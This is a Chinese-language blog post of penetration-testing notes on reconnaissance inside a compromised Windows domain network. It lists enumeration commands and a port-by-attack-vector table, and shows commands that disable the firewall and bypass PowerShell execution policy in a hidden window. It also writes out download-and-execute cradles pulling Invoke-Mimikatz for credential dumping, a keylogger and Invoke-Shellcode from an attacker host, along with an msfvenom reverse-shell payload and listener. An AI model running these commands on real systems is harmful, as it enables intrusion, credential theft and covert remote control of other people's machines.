<!DOCTYPE html><html lang="zh-CN "><head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Hongxiaodou || 内网信息收集</title>
    <meta name="author" content="hongxiaodou">
    <meta name="description" content="林深不见鹿，山巅自相逢 ">
    <meta name="keywords" content=" ">
    <link rel="icon" href="/images/1.png">
    <link rel="stylesheet" href="/css/antd.min.css">
    
    <link rel="stylesheet" href="/css/full-theme.css">
    
    <script src="/js/vue.js"></script>
    <script src="/js/antd.min.js"></script>
<!-- hexo injector head_end start --><style>
.body hanla:after {
    content: ' ';
    display: inline;
    font-family: Arial;
    font-size: 0.89em;
}

html code hanla,
html pre hanla,
html kbd hanla,
html samp hanla {
    display: none;
}

html ol > hanla,
html ul > hanla {
    display: none;
}
</style><!-- hexo injector head_end end --><meta name="generator" content="Hexo 5.4.0"></head>

<body>

    <div id="loading" style="height: 100vh; width: 100%; position: fixed;display: flex;z-index: 200; justify-content: space-between;">
        <div id="loadleft" style="width: 50%;background-color: #ffffff;transition: width 0.6s ease-out;"></div>
        <div id="loadright" style="width: 50%;background-color: #ffffff;transition: width 0.6s ease-out;"></div>
        <div style="position: fixed; height: 100vh; width: 100%;display: flex;justify-content: center;align-items: center;">
            <div id="loadcontent" style="width:400px;height:400px;padding:50px;border-radius:50%;display:flex;justify-content:center;align-items:center;border:solid 10px#a3ddfb; text-align:center;opacity:1;transition:opacity 0.3s ease-out;">
                <div>
                    <h2>LOADING...</h2>
                    <p><hanla></hanla>加载过慢请开启缓存<hanla></hanla>(浏览器默认开启)</p>
                    <div>
                        <img src="/dancingkitty.gif" alt="loading">
                    </div>
                </div>
            </div>
        </div>
    </div>

    <div id="layout">
        <transition name="into">
            <div v-show="show_page" style="display: none;">
                <div id="menu_show">
                     
<nav id="menu">
    <div class="desktop-menu">
        <a href="/">
            <span class="title">Hongxiaodou</span>
        </a>
        
        <a href="/">
            <span>
                <a-icon type="home" theme="filled">
            </a-icon></span>
            <span><hanla></hanla>主页</span>
        </a>
        
    </div>

    <div :class="'phone-menu ' + menu_show" id="phone-menu">
        <div :class="'title'" @click="menu_show=!menu_show">
            <span style="margin-right: 10px;">
                <a-icon type="appstore" theme="filled">
            </a-icon></span>
            <span><hanla></hanla>Hongxiaodou</span>
        </div>
        <div class="items" v-show="menu_show">
            
            <a href="/">
                <div class="item">
                    <div style="min-width:20px; max-width:50px; width: 10%">
                        <a-icon type="home" theme="filled">
                    </a-icon></div>
                    <div style="min-width:100px;max-width: 150%;width: 20%;"><hanla></hanla>主页</div>
                </div>
            </a>
            
        </div>
        <div class="curtain" v-show="menu_show"></div>
    </div>

</nav>
                </div>

                <div id="main">
                     
<link rel="stylesheet" href="/css/post-body.css">
<div class="article">
    <div>
        <h1>内网信息收集 </h1>
    </div>
    <div class="info">
        <span class="date">
            <span class="icon">
                <a-icon type="calendar" theme="filled">
            </a-icon></span>
            2021/10/9
        </span>

        
        <span class="category">
            <a href="/categories/内网篇">
                <span class="icon">
                    <a-icon type="book" theme="filled">
                </a-icon></span>
                内网篇
            </a>
        </span>
        

        
    </div>

    <div class="content" v-pre="">
        <p>服务器收集 更要全面<br>是否要提权<br><hanla></hanla>拿到个人<hanla></hanla>pc 域用户</p>
<span id="more"></span>

<p>网络收集<br>网段，网络中的其他主机和设备</p>
<h2 id="内网信息收集概述"><a href="#内网信息收集概述" class="headerlink" title="内网信息收集概述"></a>内网信息收集概述</h2><p>当我们渗透进内网环境后，对网络拓扑一无所知，测试人员应先对当前网络环境做出判断。<br>对当前机器角色分析，对机器所处网络环境拓扑结构分析，对机器所处区域分析。<br>当前机器角色分析：<br><hanla></hanla>判断当前主机是<hanla></hanla>web<hanla></hanla>服务器<hanla></hanla>/<hanla></hanla>开发测试服务器<hanla></hanla>/<hanla></hanla>公共服务器<hanla></hanla>/<hanla></hanla>文件服务器<hanla></hanla>/<hanla></hanla>代理服务器<hanla></hanla>/  dns<hanla></hanla>服务器<hanla></hanla>/  还是存储服务器等。具体判断过程可根据主机名，文件，网络链接情况综合完成。<br>对机器所出网络环境分析：<br>是指对所处内网进行全面数据收集和分析整理，绘制出大致的内网整体结构拓扑。<br>对机器所处区域分析：<br><hanla></hanla>判断机器所处于网络拓扑哪个区域，是在<hanla></hanla>dmz/<hanla></hanla>办公区<hanla></hanla>/<hanla></hanla>还是核心区<hanla></hanla>/<hanla></hanla>区域并不是绝对的，所以区域界限也是相对的。</p>
<h2 id="本机的信息收集"><a href="#本机的信息收集" class="headerlink" title="本机的信息收集"></a>本机的信息收集</h2><p><hanla></hanla>本机信息收集包括操作系统、权限、内网<hanla></hanla>IP<hanla></hanla>地址段、杀毒软件、端口、服务、补丁更新频率  、网络连接、共享、会话等。如果是域内主机，那么操作系统、应用软件、补丁、服务、杀毒 软件一般都是批量安装的。<br>手动信息收集<br>查询网络配置信息  </p>
<p>inconfig /all<br><hanla></hanla>查询操作系统及软件信息  </p>
<p>systeminfo | findstr /B /C:”OS Name” /C:”OS Version”   查询操作系统和版本信息 英文系统<br><hanla></hanla>systeminfo | findstr /B /C:”OS 名称” /C:”OS 版本” 查询操作系统和版本信息 中文系统<br><hanla></hanla>echo %PROCESSOR_ARCHITECTURE% 查看系统体系结构<br><hanla></hanla>wmic prouct get name, version 查看安装的软件的版本、路径等<br><hanla></hanla>powershell “Get-WmiObject -class Win32_Product |Select-Object     -Property name, version” PowerShell<hanla></hanla>收集软件的版本信息  </p>
<p>比如普通用户，不能读密码信息<br><hanla></hanla>sam 没有权限<br>钓鱼一般得到的时管理员权限<br><hanla></hanla>uac<hanla></hanla>提权  </p>
<p>ipconfig  /all </p>
<h4 id="如何查找内网的网段"><a href="#如何查找内网的网段" class="headerlink" title="如何查找内网的网段"></a>如何查找内网的网段</h4><p><hanla></hanla>1.<hanla></hanla>用工具扫网段（192.168.0.10/192.168.1.0/2.0/3.0)<br>s.exe   syn 1921680.0-192.168.255.255 445<br><hanla></hanla>192.168.10.100 445<hanla></hanla>只要有一个主机响应我，说明这个网段就有人用<br><hanla></hanla>linux 22<hanla></hanla>必开<br><hanla></hanla>2.<hanla></hanla>文件共享链接记录（frp<hanla></hanla>链接记录（浏览器访问记录））mstsc3389<hanla></hanla>链接记录<br>比如有个服务器提供文件下载的，跨网段也能访问到<br><hanla></hanla>window+r 输入一个<hanla></hanla>1，有记录他就会显示出来，翻一下记录，网页也可以看历史记录有没有历史<hanla></hanla>ip</p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IviA8S"><img src="https://s3.jpg.cm/2021/10/09/IviA8S.png" alt="IviA8S.png"></a></p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IviXmW"><img src="https://s3.jpg.cm/2021/10/09/IviXmW.png" alt="IviXmW.png"></a></p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IviVMh"><img src="https://s3.jpg.cm/2021/10/09/IviVMh.png" alt="IviVMh.png"></a></p>
<p><hanla></hanla>3.<hanla></hanla>抓包分析网络流量<br>分析流量看网段<br><hanla></hanla>meterpreter 抓取目标机所在网络流量<br><hanla></hanla>4.<hanla></hanla>黑掉路由器  </p>
<h2 id="查询本机的服务信息"><a href="#查询本机的服务信息" class="headerlink" title="查询本机的服务信息"></a>查询本机的服务信息</h2><p><hanla></hanla>wmic service list brief 查询本机服务信息<br>查询进程列表<br><hanla></hanla>tasklist 查看当前进程列表和进程用户<br><hanla></hanla>wmic process list brief 查询进程信息<br>查看启动程序信息<br><hanla></hanla>wmic startup get command, caption<br><hanla></hanla>查看计划任务<br><hanla></hanla>schtasks /query /fo LIST /v<br><hanla></hanla>查看主机开机时间<br><hanla></hanla>net statistics workstation<br><hanla></hanla>查询用户列表<br><hanla></hanla>net user 查看本机用户列表<br><hanla></hanla>net localgroup administrators 获取本地管理员信息<br><hanla></hanla>query user || qwinsta 查看在线用户  </p>
<p>列出或断开本地计算机与所连接的客户端的对话<br><hanla></hanla>net session<br><hanla></hanla>查询端口列表<br><hanla></hanla>netstat -ano<br><hanla></hanla>查看补丁列表<br><hanla></hanla>systeminfo<br><hanla></hanla>查看系统详情<br><hanla></hanla>wmic qfe get Caption,Description,HotFixID,InstalledOn<br><hanla></hanla>查看补丁的名称、描述、ID、安装时间等<br>查询本机共享列表<br><hanla></hanla>net share<br><hanla></hanla>查看本机共享列表和可访问的域共享列表<br><hanla></hanla>wmic share get name,path,status 查找共享列表  </p>
<p><hanla></hanla>映射到本地<hanla></hanla>c<hanla></hanla>盘<br>如果没有密码就不能映射了  </p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/Ivi6BQ"><img src="https://s3.jpg.cm/2021/10/09/Ivi6BQ.png" alt="Ivi6BQ.png"></a></p>
<p><hanla></hanla>查询路由表以及所有可用接口的<hanla></hanla>ARP<hanla></hanla>缓存表<br><hanla></hanla>netsh  命令可以端口转发  </p>
<p>route print<br>arp -a<br><hanla></hanla>查询防火墙相关配置<br><hanla></hanla>netsh firewall set opmode disable 关闭防火墙<hanla></hanla>(Windows Server 2003   以前的版本)<br><hanla></hanla>netsh advfirewall set allprofiles state off 关闭防火墙<hanla></hanla>(Windows Server   2003 以后的版本)<br>netsh firewall show config 查看防火墙配置<br>自动信息收集<br>为了简化手动信息收集的繁琐步骤，我们可用使用自动化脚本 ——<br><hanla></hanla> WMIC(Windows Management InstrumentationCommand   Line,Windows<hanla></hanla>管理工具命令行)<hanla></hanla>脚本，<br><hanla></hanla>脚本下载地址，执行该脚本以后，会将信息收集的结果写入<hanla></hanla>HTML<hanla></hanla>文档。<br><a target="_blank" rel="noopener" href="http://www.fuzzysecurity.com/scripts/files/wmic_info.rar">http://www.fuzzysecurity.com/scripts/files/wmic_info.rar</a>  </p>
<h2 id="域环境的信息收集"><a href="#域环境的信息收集" class="headerlink" title="域环境的信息收集"></a>域环境的信息收集</h2><p>查看当前全权限<br><hanla></hanla>whoami 查看当前权限<br><hanla></hanla>whoami /all 获取<hanla></hanla>SID<br>net user xxx /domain 查询指定用户的详情信息<br>判断是否存在域<br><hanla></hanla>ipcondig /all   可查看网关<hanla></hanla>IP<hanla></hanla>地址、DNS<hanla></hanla>的<hanla></hanla>IP<hanla></hanla>地址、域名、本机是否和<hanla></hanla>DNS<hanla></hanla>服务器处在同一网段等…<br><hanla></hanla>然后，通过反向解析查询命令<hanla></hanla>nslookup<hanla></hanla>来解析域名的<hanla></hanla>IP<hanla></hanla>地址，用解析到的<hanla></hanla>IP<hanla></hanla>地址进行  对比，<br><hanla></hanla>判断域控服务器和<hanla></hanla>DNS<hanla></hanla>服务器是否在同一台机器上。<br><hanla></hanla>systeminfo 对比查看”<hanla></hanla>域<hanla></hanla>(域名)”<hanla></hanla>和”<hanla></hanla>登录服务器<hanla></hanla>(域控制器)”<hanla></hanla>的信息是否互相匹配。<br><hanla></hanla>net config workstation 对比查看”<hanla></hanla>工作站域<hanla></hanla>DNS<hanla></hanla>名称<hanla></hanla>(  域名)”<hanla></hanla>和”<hanla></hanla>登录域<hanla></hanla>()<hanla></hanla>域控制器”<hanla></hanla>的信息是否相匹配。<br>net time /domain 判断主域。<br><hanla></hanla>xy 的域<hanla></hanla>id<hanla></hanla>是 前面这些  后门<hanla></hanla>500<hanla></hanla>是域用户的<hanla></hanla>id  </p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/Ivic92"><img src="https://s3.jpg.cm/2021/10/09/Ivic92.png" alt="Ivic92.png"></a></p>
<p>有的会显示权限拒绝<br><hanla></hanla>因为我这里是直接<hanla></hanla>payload<hanla></hanla>上的域控<br>用白银黄金票据伪造也可以访问  </p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IvibQH"><img src="https://s3.jpg.cm/2021/10/09/IvibQH.png" alt="IvibQH.png"></a></p>
<h2 id="探测域内存活主机"><a href="#探测域内存活主机" class="headerlink" title="探测域内存活主机"></a>探测域内存活主机</h2><p><hanla></hanla>使用<hanla></hanla>nbtscan<hanla></hanla>扫描本地或远程<hanla></hanla>TCP/IP<hanla></hanla>网络上开放的<hanla></hanla>NetBIOS<hanla></hanla>名称服务器，<br>使用方法：nbt.exe 192.168.1.1/20,<br><hanla></hanla>输出的结果第一列为<hanla></hanla>IP<hanla></hanla>地址，第二列为机器名和所在域的名称，<br>第三列即最后一列为及其所开启的服务的列表。<br><hanla></hanla>使用<hanla></hanla>ICMP<hanla></hanla>协议快速探测内网<br><hanla></hanla>arp-scan<hanla></hanla>工具 使用方法：<br>arp.exe -t 192.168.1.1/20<br><hanla></hanla>Empire<hanla></hanla>的<hanla></hanla>arpscan<hanla></hanla>模块<br><hanla></hanla>Nishang<hanla></hanla>中的<hanla></hanla>Invoke-ARPScan.ps1<hanla></hanla>脚本  </p>
<h2 id="域内端口扫描"><a href="#域内端口扫描" class="headerlink" title="域内端口扫描"></a>域内端口扫描</h2><p><hanla></hanla>注意端口<hanla></hanla>banner<hanla></hanla>信息<br>探测端口开放的服务<br>注意探测端口触发防御系统<br>域内存活主机探测<br>利用<br><hanla></hanla>netbios<hanla></hanla>探测内网<br>使用工具：nbtscan<br><hanla></hanla>使用方法：<br>nbtscan.exe 192.168.0.1-254  </p>
<p>出现乱码可以解决<br><a target="_blank" rel="noopener" href="https://jingyan.baidu.com/article/d621e8da6565ba2864913f47.html?qq-pf-to=pcqq.group"><hanla></hanla>https://jingyan.baidu.com/article/d621e8da6565ba2864913f47.html?qq-pf-to=pcqq.group</a><br><hanla></hanla>chcp<hanla></hanla>默认是<hanla></hanla>gbk<br><hanla></hanla>改成<hanla></hanla>utf-8<hanla></hanla>就可以了  </p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IviuYL"><img src="https://s3.jpg.cm/2021/10/09/IviuYL.png" alt="IviuYL.png"></a></p>
<pre><code><hanla></hanla>远程连接服务端口
端口号    端口说明    攻击方向
22    SSH 远程连接    爆破、SSH<hanla></hanla>隧道及内网代理转发、文件传输
23    Telnet 远程连接    爆破、嗅探、弱口令
3389    Rdp 远程桌面连接    Shift 后门（需要 Windows Server 2003 以下的系统）、爆破
5900    VNC    弱口令爆破
5632    PyAnywhere 服务    抓密码、代码执行


文件共享服务端口
端口号   端口说明  攻击方向
21/22/69   ftp/tftp 文件传输协议   允许匿名的上传，下载，爆破和嗅探操作
2049     nfs 服务     配置不当
139   samba  爆破，未授权访问，远程代码执行
389  ldap<hanla></hanla>目录访问协议   注入，允许匿名访问，弱口令


Web<hanla></hanla>应用服务端口
端口号    端口说明    攻击方向
80/443/8080    常见的 Web 服务端口    Web<hanla></hanla>攻击、爆破、对应服务器版本漏洞
7001/7002    WebLogic 控制台    Java 反序列化、弱口令
8080/8089    Jboss/Resin/Jetty/Jenkins    反序列化、控制台弱口令
9090    WebSpere 控制台    Java 反序列化、弱口令
4848    GlassFish 控制台    弱口令
1352    Lotus domino 邮件服务    弱口令、信息泄露、爆破
10000    Webmin-Web 控制面板    弱口令

数据库服务端口
端口号    端口说明    攻击方向
3306    MySQL    注入、提权、爆破
1433    MSSQL    注入、提权、SA 弱口令、爆破
1521    Oracle    TNS 爆破、注入、反弹 Shell
5432    PostgreSQL    爆破、注入、弱口令
27017    MongoDB    爆破、未授权访问
6379    Redis    未授权访问、弱口令爆破
5000    SyBase/DB2    爆破、注入

邮件服务端口
端口号     端口说明     攻击方向
25   smtp<hanla></hanla>邮件服务    邮件伪造
110    pop3<hanla></hanla>协议   爆破，嗅探
143   imap<hanla></hanla>协议    爆破

网络常见协议端口
端口号   端口说明   攻击方向
53    dns 域名系统      允许区域传送，dns<hanla></hanla>劫持，缓存投毒，欺骗
67、68     DHCP       劫持，欺骗
161   snmp<hanla></hanla>协议     爆破，收集目标内网信息

特殊服务端口
端口号     端口说明     攻击方向
2181    zookeeper<hanla></hanla>服务     未授权访问
8069    zabbix<hanla></hanla>服务    远程执行，sql<hanla></hanla>注入、
9200/9300    Elasticsearch<hanla></hanla>服务    远程执行
11211  memcache<hanla></hanla>服务    未授权访问
512/513/514   linux rexec 服务   爆破，Rlogin<hanla></hanla>登录
873    Rsync<hanla></hanla>服务   匿名访问，文件上传
3690    svn<hanla></hanla>服务   svn<hanla></hanla>泄露 ，未授权访问
50000    sap management console   远程执行
</code></pre>
<p>扫描端口的工具<br>扫描域内端口信息<br><hanla></hanla>telnet<hanla></hanla>命令进行扫描<br><hanla></hanla>S<hanla></hanla>扫描器<br><hanla></hanla>Metatsploit<hanla></hanla>框架，”msfconsole”<hanla></hanla>下的”serach portscan”<hanla></hanla>命令<br><hanla></hanla>PowerSploit<hanla></hanla>的<hanla></hanla>Invoke-ARPScan.ps1<hanla></hanla>脚本<br><hanla></hanla>Nishang<hanla></hanla>中的<hanla></hanla>Invoke-PortScan<hanla></hanla>模块<br><hanla></hanla>端口<hanla></hanla>banner<hanla></hanla>信息的利用  </p>
<h2 id="收集域内基础信息"><a href="#收集域内基础信息" class="headerlink" title="收集域内基础信息"></a>收集域内基础信息</h2><pre><code>收集域内基础信息  
net view /domain 查询域  
net view /domain:HACHE 查询域内的所有计算机  
net group /domain 查询域内的所有计算机  
net group "domain computers" /domain 查询所有域成员计算机列表  
net accounts /domain 获取域密码信息   
nltest /domain_trusts 获取域信任信息   
</code></pre>
<h3 id="查找域控制器"><a href="#查找域控制器" class="headerlink" title="查找域控制器"></a>查找域控制器</h3><pre><code><hanla></hanla>nltest /DCLIST:hacke 查看域控制器的机器名
Nslookup -type=SRV_ldap._tcp 查看域控制器的主机名
net time /domain 查看当前时间
net group "Domain Controllers" /domain 查看域控制器组
netdom query pdc 查看域控制器的机器名

获取域内的用户和管理员信息
</code></pre>
<h3 id="查询域内用户列表"><a href="#查询域内用户列表" class="headerlink" title="查询域内用户列表"></a>查询域内用户列表</h3><pre><code><hanla></hanla>net user /domain 向域控制器进行查询
wmic useraccount get /all 获取域内用户的详细信息
dsquery user 查看存在的用户
net localgroup administrators 查询本地管理员用户
查询域管理员用户组
net group "domain admins" /domain 查询域管理员用户
net group "Enterprise admins" /domain 查询管理员用户组
</code></pre>
<h3 id="定位域管理员"><a href="#定位域管理员" class="headerlink" title="定位域管理员"></a>定位域管理员</h3><pre><code><hanla></hanla>在域网络攻击测试中，获取域内的一个支点后，需要获取域管理员权限；
定位域内管理员的常规渠道，一是日志，二是会话。
常见域管理员定位工具：
psloggedon.exe
PVEFindADUser.exe
netview.exe
Nmap<hanla></hanla>的<hanla></hanla>NSE<hanla></hanla>脚本
PowerView<hanla></hanla>脚本

Empire<hanla></hanla>的<hanla></hanla>user_hunter<hanla></hanla>模块
</code></pre>
<h3 id="查找域管理进程"><a href="#查找域管理进程" class="headerlink" title="查找域管理进程"></a>查找域管理进程</h3><pre><code><hanla></hanla>net group "Domain Admins" /domain 获取域管理员列表
tasklist /v 列出本机的所有进程及进程用户
net group "Domain Controllers" /domain 查询域控制器列表
NetSess -h 收集所有活动域的会话列表
分析域内网段划分情况及拓扑结构
在掌握了内网的相关信息后， 
渗透测试人员可以分析目标网络的结构和安全防御策略，获取网络信息、
各部门的<hanla></hanla>IP<hanla></hanla>地址段，绘制内网的拓扑结构图。

默认<hanla></hanla>powershell<hanla></hanla>是不能执行脚本的
获取脚本策略
get-executionpolicy
更改执行策略必须以管理员身份执行才可以，否则报错注册表安全问题
set-executionpolicy unrestricted
绕过脚本
-exec bypass
powershell.exe -Executionpolicy BYpass -file 123.ps1   绕过安全策略直行脚本
powershell.exe -Executionpolicy BYpass  -windowstyle hidden -nologo -nonlnteractive -noprofile -file 123.ps1  
本地隐藏绕过权限直行脚本
cmd<hanla></hanla>下使用<hanla></hanla>powershell
powershell -exec bypass "import-module c:\powershell.ps1;Get-NetUser"
</code></pre>
<h3 id="Powersploit"><a href="#Powersploit" class="headerlink" title="Powersploit"></a>Powersploit</h3><p><hanla></hanla>PowerSploit<hanla></hanla>是<hanla></hanla>Microsoft PowerShell<hanla></hanla>模块的集合，可用于在评估的所有阶段帮助渗透测试人员。<br><hanla></hanla>PowerSploit<hanla></hanla>由以下模块和脚本组成：<br><a target="_blank" rel="noopener" href="https://github.com/PowerShellMafia/PowerSploit">https://github.com/PowerShellMafia/PowerSploit</a></p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/Ivi13f"><img src="https://s3.jpg.cm/2021/10/09/Ivi13f.png" alt="Ivi13f.png"></a></p>
<p>powersploit<br>PS C:&gt; import-module .\powerview.ps1<br>PS C:&gt; Get-NetDomain  获取当前的域名称<br><hanla></hanla>Get-Netuser 返回所有域内成员的详细信息<br><hanla></hanla>Get-NetDomainController 获取所有的域内的控制器信息<br><hanla></hanla>Get-NetComputer  获取所有域内机器的名称<br><hanla></hanla>Get-Netshare  获取域内的所有的网络共享<br><hanla></hanla>Get-NetRDPSESSION  获取指定服务的远程连接信息<br><hanla></hanla>Get-NetProcess  获取进程的详细信息<br><hanla></hanla>Get-ADOPJECT  获取活动目录的信息<br>这个命令是用户是否登陆计算机且判断用户是否有管理员权限<br><hanla></hanla>invoke-processhunter  </p>
<p>powersploit 信息收集<br><hanla></hanla>invoke-portscan  用于扫描端口<br><hanla></hanla>iex(new-object net.webclient).downloadstring(“<a target="_blank" rel="noopener" href="http://192.168.3.1/PowerSploit/Recon/Invoke-Portscan.ps1&quot;">http://192.168.3.1/PowerSploit/Recon/Invoke-Portscan.ps1"</a>)   下载扫描脚本到服务器<br><hanla></hanla>invoke-portscan -hosts 192.168.3.1,192.168.3.200 -ports “21,22,80”  </p>
<p>nvoke-mimikatz  抓密码<br><hanla></hanla>iex(new-object net.webclient).downloadstring(“<a target="_blank" rel="noopener" href="http://192.168.3.1/">http://192.168.3.1/</a>  PowerSploit/Exfiltration/Invoke-Mimikatz.ps1”)<br>Invoke-Mimikatz -dumpcreds  导出  </p>
<p>hash  </p>
<p>get-keystrokes   键盘记录<br><hanla></hanla>iex(new-object net.webclient).downloadstring(“<a target="_blank" rel="noopener" href="http://192.168.3.1/">http://192.168.3.1/</a>  PowerSploit/Exfiltration/Get-Keystrokes.ps1”)<br><hanla></hanla>Get-Keystrokes -logpath C:\Users\admin\123.txt      记录键盘保存到<hanla></hanla>123.txt<hanla></hanla>里面  </p>
<h3 id="msf-调用powershell"><a href="#msf-调用powershell" class="headerlink" title="msf 调用powershell"></a><hanla></hanla>msf 调用<hanla></hanla>powershell</h3><p>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.3.129   LPORT=1123 -f powershell -o /root/xdx.ps1  </p>
<p>侦听<br><hanla></hanla>use exploit/multi/handler<br>set lport 1123<br>run  </p>
<p>iex(new-object net.webclient).downloadstring(“<a target="_blank" rel="noopener" href="http://192.168.3.1/">http://192.168.3.1/</a><hanla></hanla>  xdx.ps1”)  xdx.ps1 下载生成好的<hanla></hanla>ps<hanla></hanla>脚本  </p>
<p>iex(new-object net.webclient).downloadstring(“<a target="_blank" rel="noopener" href="http://192.168.3.1/">http://192.168.3.1/</a>  PowerSploit/CodeExecution/Invoke-Shellcode.ps1”)<br><hanla></hanla>下载</p>
<p><hanla></hanla>invoke-shellcode.ps1   可以将<hanla></hanla>msf<hanla></hanla>生成是<hanla></hanla>payload<hanla></hanla>进程注入</p>
<p>Invoke-Shellcode  -shellcode  $buf  -Force    </p>
<p><hanla></hanla>执行进程注入，msf<hanla></hanla>会侦听回来一个回话</p>

    </div>

    
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.css">
    <div id="comment">
        <div id="gitalk-container">
        </div>
    </div>
    
</div>
                     
<footer id="footer">
    <div class="footer-wrap">
        <div>
            © 2018 - 2021 Hongxiaodou
            <span class="footer-icon">
                <a-icon type="flag" theme="filled"></a-icon></span>
            @hongxiaodou
        </div>
        <div></div>
        <div>Based on the <a target="_blank" rel="noopener" href="https://hexo.io/">Hexo Engine</a> &amp; <a target="_blank" rel="noopener" href="https://github.com/korilin/hexo-theme-particle">Particle Theme</a></div>
        
    </div>

</footer>

<script src="/js/highlight.min.js"></script>
<script src="/js/particle.js"></script>
                </div>
            </div>
        </transition>
    </div>

    <script>
    new Vue({
        el: "#layout",
        data: {
            show_page: false,
            onload_menu: false,
            menu_show: false,
            card_top: 100
        },
        created: function () {
            var that = this
            window.onload = function () {
                that.show_page = true
                document.getElementById("loadcontent").style.opacity = 0
                setTimeout(function () {
                    document.getElementById("loadleft").style.width = 0
                    document.getElementById("loadright").style.width = 0
                }, 300)
                setTimeout(function () {
                    document.getElementById("loading").style = "display:none"
                }, 600)
            }
        },
        mounted: function () {
            var that = this
            window.addEventListener('scroll', function (e) {
                that.menu_show = false
            })
        },
        methods: {
            home_click: function () {
                window.scrollTo({
                    top: window.innerHeight - 80,
                    behavior: "smooth",
                });
            }
        }
    })
</script>

<script src="https://cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js"></script>
<script>
    const gitalk = new Gitalk({
        clientID: '',
        clientSecret: '',
        repo: 'hexo-theme-particle',      // The repository of store comments,
        owner: 'korilin',
        admin: ['korilin'],
        language: 'zh-CN',
        id: location.pathname,      // Ensure uniqueness and length less than 50
        distractionFreeMode: true  // Facebook-like distraction free mode
    })
    gitalk.render('gitalk-container')
</script>



</body></html>